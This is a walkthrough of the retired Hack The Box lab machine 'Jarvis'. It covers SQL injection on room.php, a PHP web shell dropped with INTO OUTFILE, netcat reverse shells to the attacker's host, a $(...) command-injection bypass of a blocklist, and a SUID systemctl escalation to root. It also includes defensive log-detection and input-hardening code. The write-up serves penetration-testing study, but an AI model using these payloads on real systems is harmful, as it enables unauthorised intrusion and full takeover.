HTB Walkthrough: Jarvis w/o Metasploit (retired)

Shraddha M.
4 min readJun 28, 2021

Jarvis is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: Jarvis | Difficulty Level: Medium | Operating System: Linux

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/Jarvis]
└─# nmap -sC -sV -oA Jarvis 10.10.10.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 17:49 EDT
Nmap scan report for 10.10.10.143
Host is up (0.10s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(root💀kali)-[/home/kali/labs/HTB/Jarvis]
└─# nmap -p- -Pn -oA Allports 10.10.10.143
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-21 17:50 EDT
Nmap scan report for 10.10.10.143
Host is up (0.095s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
64999/tcp open unknown

Browsing to http://10.10.10.143/ reveals a hotel webpage. The page mentions the domain 'supersecurehotel.htb', so I added it to /etc/hosts.

When you click on one of the rooms, the browser goes to 'http://10.10.10.143/room.php?cod=1'. Trying SQLi and directory traversal here returns the same page with no image. Blind injection works: the page responds differently to integer conditions appended without quotes (e.g. 1=1 versus 1=2).

Gives error (page with no image): http://10.10.10.143/room.php?cod=1%20and%201=2
Returns image (no error): http://10.10.10.143/room.php?cod=1%20and%201=

Exploitation

Identify the number of columns: since 'order by 8' returns the page with no image, the query has 7 columns.
http://10.10.10.143/room.php?cod=1%20order%20by%208

Looking for injectable columns: http://10.10.10.143/room.php?cod=7 union select 1,2,3,4,5,6,7
The page rendered the values 5, 2, 3 and 4, so those are the columns whose content is displayed and can be used to read data.

Finding the database user: http://10.10.10.143/room.php?cod=7 union select 1,user(),3,4,5,6,7

http://10.10.10.143/room.php?cod=7 union select 1,user(),database(),4,5,6,7
Output: DBadmin@localhost

http://10.10.10.143/room.php?cod=7 union select 1,table_name,database(),4,5,6,7 from information_schema.tables
Output: room

Reading files:

http://10.10.10.143/room.php?cod=0 union select 1, load_file('/etc/passwd'),3,4,5,6,7

Use '0' in cod=0 so that the original query matches no valid row (for example room cod=1) and only the UNIONed row is rendered.

Getting reverse shell

Looking for the document root to confirm the directory to write files into. The default path for the Apache site config is /etc/apache2/sites-enabled/000-default.conf.

http://10.10.10.143/room.php?cod=0 union select 1, load_file('/etc/apache2/sites-enabled/000-default.conf'),3,4,5,6,7

We find that the document root is /var/www/html. Testing whether a file can be written there with INTO OUTFILE:

http://10.10.10.143/room.php?cod=0 union select 1, load_file('/var/www/html/test.txt'),3,4,5,6,7 into OUTFILE '/var/www/html/test.txt'

Executing commands:
(a) Write the PHP code into test1.php

http://10.10.10.143/room.php?cod=0 union select 1, "<?php system($_GET['cmd']); ?>",3,4,5,6,7 into OUTFILE '/var/www/html/test1.php'

(b) Then request the following in another browser tab

http://10.10.10.143/test1.php?cmd=/bin/nc -e /bin/bash <Kali IP> 9876

(c) Open a nc listener in Kali

And you will get a reverse shell. We need to escalate to user ‘pepper’ for user flag.
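As an added defensive example (not part of the original walkthrough), the following Python scores Apache access-log lines for the injection chain used above: the boolean probe, UNION SELECT, load_file(), INTO OUTFILE, and the request to the dropped web shell. The log lines are constructed; the source IP, timestamps and byte counts are invented.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache access-log lines mirroring the request chain in this walkthrough
# (source IP, timestamps and byte counts are invented).
SAMPLE_LOG = """\
10.10.14.5 - - [21/Jun/2021:17:55:01 -0400] "GET /room.php?cod=1 HTTP/1.1" 200 5321
10.10.14.5 - - [21/Jun/2021:17:55:09 -0400] "GET /room.php?cod=1%20and%201=2 HTTP/1.1" 200 4102
10.10.14.5 - - [21/Jun/2021:17:56:30 -0400] "GET /room.php?cod=7%20union%20select%201,user(),database(),4,5,6,7 HTTP/1.1" 200 4210
10.10.14.5 - - [21/Jun/2021:17:58:02 -0400] "GET /room.php?cod=0%20union%20select%201,%20load_file(%27/etc/passwd%27),3,4,5,6,7 HTTP/1.1" 200 4890
10.10.14.5 - - [21/Jun/2021:18:01:44 -0400] "GET /room.php?cod=0%20union%20select%201,%22%3C?php%20system($_GET[%27cmd%27]);%20?%3E%22,3,4,5,6,7%20into%20OUTFILE%20%27/var/www/html/test1.php%27 HTTP/1.1" 200 4102
10.10.14.5 - - [21/Jun/2021:18:02:10 -0400] "GET /test1.php?cmd=/bin/nc%20-e%20/bin/bash%2010.10.14.5%209876 HTTP/1.1" 200 0
"""

# Combined log format: client, identd, user, [timestamp], "METHOD URL PROTO", status ...
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Each rule is matched against the fully URL-decoded, lower-cased request URL.
RULES = [
    ("boolean-based probe", re.compile(r"\b(and|or)\s+\d+\s*=")),
    ("union-based extraction", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("server-side file read", re.compile(r"\bload_file\s*\(")),
    ("server-side file write", re.compile(r"\binto\s+(out|dump)file\b")),
    ("php code in parameter", re.compile(r"<\?php")),
    ("shell binary in parameter", re.compile(r"/bin/(nc|sh|bash)\b")),
]

def decode_url(url):
    """Decode percent-encoding repeatedly so double-encoded payloads are not missed."""
    previous = None
    while url != previous:
        previous, url = url, unquote_plus(url)
    return url

def analyze(log_text):
    """Return one (src, raw_url, [matched rule names]) tuple per suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # skip lines that are not in combined format
        decoded = decode_url(m.group("url")).lower()
        hits = [name for name, rx in RULES if rx.search(decoded)]
        if hits:
            alerts.append((m.group("src"), m.group("url"), hits))
    return alerts

if __name__ == "__main__":
    for src, url, hits in analyze(SAMPLE_LOG):
        print(f"{src} {url} -> {', '.join(hits)}")
```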

Privilege Escalation (www-data → pepper)

Running enumeration script (linpeas.sh)

[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

Examining simpler.py. As seen in the function below, it passes user input to os.system() after checking for a short list of 'forbidden' characters.

import os

def exec_ping():
    # blocklist of shell metacharacters; note that '$', '(' and ')' are not on it
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    # the input is concatenated into a command string that a shell interprets
    os.system('ping ' + command)

Trying command injection with characters that are not on the forbidden list, using the sudo rule to run the script as user 'pepper'.

www-data@jarvis:/dev/shm$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
(simpler.py ASCII-art banner)
@ironhackers.es

***********************************************

Enter an IP: $(whoami)
ping: pepper: Temporary failure in name resolution

We cannot put the reverse-shell command inline because it contains forbidden characters (the '-' in 'nc -e'):

Enter an IP: $(nc -e /bin/bash <Kali IP> 9877)
Got you

Let us write the command to a script instead and call that script via simpler.py. Open a nc listener in another Kali tab.

www-data@jarvis:/tmp$ echo "nc -e /bin/bash <Kali IP> 9877" > test.sh

Note: Make sure you change permission of test.sh (chmod +x test.sh)

www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(/tmp/test.sh)

And you will get reverse shell + user flag.
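The bypass above works because simpler.py blocklists a few characters but '$(' and ')' are not among them. As an added example (not code from the box or from this walkthrough), here is a hardened exec_ping in Python that allow-lists the input as a literal IP address and hands an argv list to subprocess so no shell ever sees it; blocklist_allows reproduces the original check only for comparison, and the run parameter of safe_ping is an assumption added so the function can be tested without calling ping.

```python
import ipaddress
import subprocess

# The original blocklist from simpler.py, kept only to show why it is insufficient.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']

def blocklist_allows(text):
    """Reproduce the original check: True when no forbidden substring is present."""
    return not any(bad in text for bad in FORBIDDEN)

def validate_ip(text):
    """Allow-list validation: return the canonical address or raise ValueError.
    Anything that is not a literal IPv4/IPv6 address ($(...), spaces, hostnames) is rejected."""
    return str(ipaddress.ip_address(text.strip()))

def is_valid_ip(text):
    """Boolean wrapper around validate_ip."""
    try:
        validate_ip(text)
        return True
    except ValueError:
        return False

def build_ping_argv(text, count=1):
    """argv list for ping; with no shell involved, metacharacters are never interpreted."""
    return ["ping", "-c", str(count), validate_ip(text)]

def safe_ping(text, count=1, run=subprocess.run):
    """Hardened replacement for exec_ping. `run` is injectable so tests need not call ping."""
    if not is_valid_ip(text):
        print("Rejected: not an IP address")
        return False
    completed = run(build_ping_argv(text, count), capture_output=True, text=True)
    return completed.returncode == 0

if __name__ == "__main__":
    for candidate in ["10.10.10.143", "$(whoami)", "$(/tmp/test.sh)"]:
        print(f"{candidate!r}: blocklist allows={blocklist_allows(candidate)}, "
              f"allow-list accepts={is_valid_ip(candidate)}")
```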

Privilege Escalation (pepper → root)

Running enumeration script (linpeas.sh)

root 384 0.8 1.6 61916 16520 ? Ss 18:40 0:16 python3 /root/sqli_defender.py

[+] SUID - Check easy privesc, exploits and write perms
-rwsr-x--- 1 root pepper 171K Feb 17 2019 /bin/systemctl

systemctl is the command-line interface to systemd, and here it is SUID root and executable by pepper. Looking it up on GTFOBins: https://gtfobins.github.io/gtfobins/systemctl/

Following the SUID section. I created all of this in /home/pepper as /tmp was giving me errors. Also, open a nc listener in another Kali tab.

pepper@jarvis:~$ cd /home/pepper
pepper@jarvis:~$ ls
Web user.txt
pepper@jarvis:~$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/bash -c "nc -e /bin/bash <Kali IP> 9890"
> [Install]
> WantedBy=multi-user.target' > /home/pepper/test.service
pepper@jarvis:~$ systemctl link /home/pepper/test.service
Created symlink /etc/systemd/system/test.service -> /home/pepper/test.service.
pepper@jarvis:~$ systemctl enable --now /home/pepper/test.service
Created symlink /etc/systemd/system/multi-user.target.wants/test.service -> /home/pepper/test.service.

You will get a reverse shell as root and the root flag.
